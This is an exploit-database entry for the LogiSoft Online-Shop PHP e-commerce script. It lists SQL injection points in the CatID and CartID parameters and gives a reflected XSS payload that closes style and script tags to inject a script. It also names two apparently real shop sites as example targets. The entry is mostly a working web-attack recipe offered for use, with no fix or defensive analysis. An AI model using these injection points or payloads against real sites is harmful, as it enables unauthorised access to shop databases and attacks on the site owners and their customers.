LogiSoft Online-Shop / E-Commerce-System Sql Injection/XSS Vulnerabilties

2012-06-20T00:00:00
ID 1337DAY-ID-18710
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-06-20T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            LogiSoft Online-Shop / E-Commerce-System Sql Injection/XSS Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
.:. Script         : http://www.logisoft.be/
#######################################################################

===[ Exploit ]===


Multiple Sql Injection
=======================
http://SITE/index.php?CatID=sql
http://SITE/index.php?CartID=sql


Example:
http://www.alltronic.be/shop/
http://php.bene.ws/shop/



Reflected XSS
==============


http://SITE/index.php?CatID='"--></style></script><script>alert(1337)</script>


####################################################################### 



#  0day.today [2018-04-12]  #